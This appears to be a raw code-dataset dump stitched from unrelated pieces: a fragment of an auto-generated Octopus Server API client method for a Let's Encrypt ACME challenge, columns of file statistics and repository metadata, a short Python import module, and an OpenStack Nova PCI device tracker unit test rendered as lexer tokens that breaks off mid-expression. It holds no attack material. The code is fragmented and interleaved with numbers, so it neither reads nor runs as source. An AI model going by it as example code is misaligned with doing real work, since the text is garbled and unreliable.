raise ValueError("Missing the required parameter `token` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'token' in params:
path_params['token'] = params['token'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/.well-known/acme-challenge//{token}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.802632
| 202
| 0.685435
| 1,658
| 13,924
| 5.373341
| 0.112183
| 0.035021
| 0.062858
| 0.094287
| 0.914805
| 0.914805
| 0.914805
| 0.898642
| 0.894825
| 0.894825
| 0
| 0.015306
| 0.244542
| 13,924
| 303
| 203
| 45.953795
| 0.831638
| 0.384516
| 0
| 0.76129
| 1
| 0
| 0.17582
| 0.08835
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045161
| false
| 0
| 0.025806
| 0
| 0.135484
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
edc973df64528cf4245abc9265a14b35922d8654
| 90
|
py
|
Python
|
models/__init__.py
|
MikeLagunes/Supervised-Triplet-Network
|
575bcaf8f17affb0ff0e93212dde0f3f634c196f
|
[
"MIT"
] | 6
|
2019-07-07T08:48:03.000Z
|
2021-07-29T06:32:01.000Z
|
models/__init__.py
|
MikeLagunes/Supervised-Triplet-Network
|
575bcaf8f17affb0ff0e93212dde0f3f634c196f
|
[
"MIT"
] | 1
|
2019-03-11T03:28:36.000Z
|
2019-03-13T12:45:59.000Z
|
models/__init__.py
|
MikeLagunes/Supervised-Triplet-Network
|
575bcaf8f17affb0ff0e93212dde0f3f634c196f
|
[
"MIT"
] | 1
|
2022-02-09T12:48:09.000Z
|
2022-02-09T12:48:09.000Z
|
from cnn_resnet import *
from triplet_resnet import *
from triplet_resnet_softmax import *
| 30
| 36
| 0.844444
| 13
| 90
| 5.538462
| 0.461538
| 0.333333
| 0.444444
| 0.638889
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 90
| 3
| 36
| 30
| 0.911392
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b62906204f911033c0595c5e3173a9a985340aaa
| 43,687
|
py
|
Python
|
nova/tests/unit/pci/test_manager.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/pci/test_manager.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/pci/test_manager.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright (c) 2012 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'copy'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_serialization'
name|'import'
name|'jsonutils'
newline|'\n'
nl|'\n'
name|'import'
name|'nova'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'vm_states'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'fields'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'pci'
name|'import'
name|'manager'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'pci'
name|'import'
name|'fakes'
name|'as'
name|'pci_fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
name|'import'
name|'uuidsentinel'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|fake_pci
name|'fake_pci'
op|'='
op|'{'
nl|'\n'
string|"'compute_node_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'address'"
op|':'
string|"'0000:00:00.1'"
op|','
nl|'\n'
string|"'product_id'"
op|':'
string|"'p'"
op|','
nl|'\n'
string|"'vendor_id'"
op|':'
string|"'v'"
op|','
nl|'\n'
string|"'request_id'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'status'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceStatus'
op|'.'
name|'AVAILABLE'
op|','
nl|'\n'
string|"'dev_type'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceType'
op|'.'
name|'STANDARD'
op|','
nl|'\n'
string|"'parent_addr'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'numa_node'"
op|':'
number|'0'
op|'}'
newline|'\n'
DECL|variable|fake_pci_1
name|'fake_pci_1'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
nl|'\n'
name|'product_id'
op|'='
string|"'p1'"
op|','
name|'vendor_id'
op|'='
string|"'v1'"
op|')'
newline|'\n'
DECL|variable|fake_pci_2
name|'fake_pci_2'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.3'"
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|fake_db_dev
name|'fake_db_dev'
op|'='
op|'{'
nl|'\n'
string|"'created_at'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'updated_at'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'deleted_at'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'deleted'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'compute_node_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'address'"
op|':'
string|"'0000:00:00.1'"
op|','
nl|'\n'
string|"'vendor_id'"
op|':'
string|"'v'"
op|','
nl|'\n'
string|"'product_id'"
op|':'
string|"'p'"
op|','
nl|'\n'
string|"'numa_node'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'dev_type'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceType'
op|'.'
name|'STANDARD'
op|','
nl|'\n'
string|"'status'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceStatus'
op|'.'
name|'AVAILABLE'
op|','
nl|'\n'
string|"'dev_id'"
op|':'
string|"'i'"
op|','
nl|'\n'
string|"'label'"
op|':'
string|"'l'"
op|','
nl|'\n'
string|"'instance_uuid'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'extra_info'"
op|':'
string|"'{}'"
op|','
nl|'\n'
string|"'request_id'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'parent_addr'"
op|':'
name|'None'
op|','
nl|'\n'
op|'}'
newline|'\n'
DECL|variable|fake_db_dev_1
name|'fake_db_dev_1'
op|'='
name|'dict'
op|'('
name|'fake_db_dev'
op|','
name|'vendor_id'
op|'='
string|"'v1'"
op|','
nl|'\n'
name|'product_id'
op|'='
string|"'p1'"
op|','
name|'id'
op|'='
number|'2'
op|','
nl|'\n'
DECL|variable|address
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
nl|'\n'
DECL|variable|numa_node
name|'numa_node'
op|'='
number|'0'
op|')'
newline|'\n'
DECL|variable|fake_db_dev_2
name|'fake_db_dev_2'
op|'='
name|'dict'
op|'('
name|'fake_db_dev'
op|','
name|'id'
op|'='
number|'3'
op|','
name|'address'
op|'='
string|"'0000:00:00.3'"
op|','
nl|'\n'
name|'numa_node'
op|'='
name|'None'
op|','
name|'parent_addr'
op|'='
string|"'0000:00:00.1'"
op|')'
newline|'\n'
DECL|variable|fake_db_devs
name|'fake_db_devs'
op|'='
op|'['
name|'fake_db_dev'
op|','
name|'fake_db_dev_1'
op|','
name|'fake_db_dev_2'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|fake_pci_requests
name|'fake_pci_requests'
op|'='
op|'['
nl|'\n'
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|','
nl|'\n'
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|PciDevTrackerTestCase
name|'class'
name|'PciDevTrackerTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|_create_fake_instance
indent|' '
name|'def'
name|'_create_fake_instance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'uuid'
op|'='
name|'uuidsentinel'
op|'.'
name|'instance1'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'pci_devices'
op|'='
name|'objects'
op|'.'
name|'PciDeviceList'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'task_state'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|_fake_get_pci_devices
dedent|''
name|'def'
name|'_fake_get_pci_devices'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'node_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'fake_db_devs'
op|'['
op|':'
op|']'
newline|'\n'
nl|'\n'
DECL|member|_fake_pci_device_update
dedent|''
name|'def'
name|'_fake_pci_device_update'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'node_id'
op|','
name|'address'
op|','
name|'value'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'update_called'
op|'+='
number|'1'
newline|'\n'
name|'self'
op|'.'
name|'called_values'
op|'='
name|'value'
newline|'\n'
name|'fake_return'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_db_dev'
op|')'
newline|'\n'
name|'return'
name|'fake_return'
newline|'\n'
nl|'\n'
DECL|member|_fake_pci_device_destroy
dedent|''
name|'def'
name|'_fake_pci_device_destroy'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'node_id'
op|','
name|'address'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'destroy_called'
op|'+='
number|'1'
newline|'\n'
nl|'\n'
DECL|member|_create_pci_requests_object
dedent|''
name|'def'
name|'_create_pci_requests_object'
op|'('
name|'self'
op|','
name|'mock_get'
op|','
name|'requests'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance_uuid'
op|'='
name|'instance_uuid'
name|'or'
name|'uuidsentinel'
op|'.'
name|'instance1'
newline|'\n'
name|'pci_reqs'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'request'
name|'in'
name|'requests'
op|':'
newline|'\n'
indent|' '
name|'pci_req_obj'
op|'='
name|'objects'
op|'.'
name|'InstancePCIRequest'
op|'('
name|'count'
op|'='
name|'request'
op|'['
string|"'count'"
op|']'
op|','
nl|'\n'
name|'spec'
op|'='
name|'request'
op|'['
string|"'spec'"
op|']'
op|')'
newline|'\n'
name|'pci_reqs'
op|'.'
name|'append'
op|'('
name|'pci_req_obj'
op|')'
newline|'\n'
dedent|''
name|'mock_get'
op|'.'
name|'return_value'
op|'='
name|'objects'
op|'.'
name|'InstancePCIRequests'
op|'('
nl|'\n'
name|'instance_uuid'
op|'='
name|'instance_uuid'
op|','
nl|'\n'
name|'requests'
op|'='
name|'pci_reqs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|setUp
dedent|''
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'PciDevTrackerTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'fake_context'
op|'='
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.pci_device_get_all_by_node'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_get_pci_devices'
op|')'
newline|'\n'
comment|'# The fake_pci_whitelist must be called before creating the fake'
nl|'\n'
comment|'# devices'
nl|'\n'
name|'patcher'
op|'='
name|'pci_fakes'
op|'.'
name|'fake_pci_whitelist'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'addCleanup'
op|'('
name|'patcher'
op|'.'
name|'stop'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_fake_instance'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_pcidev_tracker_create
dedent|''
name|'def'
name|'test_pcidev_tracker_create'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stale'
op|'.'
name|'keys'
op|'('
op|')'
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stats'
op|'.'
name|'pools'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'node_id'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'nova'
op|'.'
name|'objects'
op|'.'
name|'PciDeviceList'
op|','
string|"'get_by_compute_node'"
op|')'
newline|'\n'
DECL|member|test_pcidev_tracker_create_no_nodeid
name|'def'
name|'test_pcidev_tracker_create_no_nodeid'
op|'('
name|'self'
op|','
name|'mock_get_cn'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mock_get_cn'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'nova'
op|'.'
name|'objects'
op|'.'
name|'PciDeviceList'
op|','
string|"'get_by_compute_node'"
op|')'
newline|'\n'
DECL|member|test_pcidev_tracker_create_with_nodeid
name|'def'
name|'test_pcidev_tracker_create_with_nodeid'
op|'('
name|'self'
op|','
name|'mock_get_cn'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|','
name|'node_id'
op|'='
number|'1'
op|')'
newline|'\n'
name|'mock_get_cn'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.pci.whitelist.Whitelist.device_assignable'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|member|test_update_devices_from_hypervisor_resources
name|'def'
name|'test_update_devices_from_hypervisor_resources'
op|'('
name|'self'
op|','
name|'_mock_dev_assign'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|']'
newline|'\n'
name|'fake_pci_devs_json'
op|'='
name|'jsonutils'
op|'.'
name|'dumps'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'tracker'
op|'.'
name|'update_devices_from_hypervisor_resources'
op|'('
name|'fake_pci_devs_json'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_hvdev_new_dev
dedent|''
name|'def'
name|'test_set_hvdev_new_dev'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_pci_3'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.4'"
op|','
name|'vendor_id'
op|'='
string|"'v2'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_1'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'4'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'address'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'0000:00:00.1'"
op|','
string|"'0000:00:00.2'"
op|','
nl|'\n'
string|"'0000:00:00.3'"
op|','
string|"'0000:00:00.4'"
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|','
string|"'v2'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_hvdev_changed
dedent|''
name|'def'
name|'test_set_hvdev_changed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_pci_v2'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
name|'vendor_id'
op|'='
string|"'v1'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_v2'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_hvdev_remove
dedent|''
name|'def'
name|'test_set_hvdev_remove'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
op|'['
name|'fake_pci'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
op|'['
name|'dev'
name|'for'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
nl|'\n'
name|'if'
name|'dev'
op|'.'
name|'status'
op|'=='
string|"'removed'"
op|']'
op|')'
op|','
nl|'\n'
number|'2'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_set_hvdev_changed_stal
name|'def'
name|'test_set_hvdev_changed_stal'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'fake_pci_3'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
name|'vendor_id'
op|'='
string|"'v2'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stale'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stale'
op|'['
string|"'0000:00:00.2'"
op|']'
op|'['
string|"'vendor_id'"
op|']'
op|','
string|"'v2'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_instance_active
name|'def'
name|'test_update_pci_for_instance_active'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claims'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'allocations'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|','
string|"'v'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_instance_fail
name|'def'
name|'test_update_pci_for_instance_fail'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pci_requests'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'pci_requests'
op|'['
number|'0'
op|']'
op|'['
string|"'count'"
op|']'
op|'='
number|'4'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claims'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'0'
op|')'
newline|'\n'
name|'devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
nl|'\n'
name|'self'
op|'.'
name|'inst'
op|','
nl|'\n'
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'allocations'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
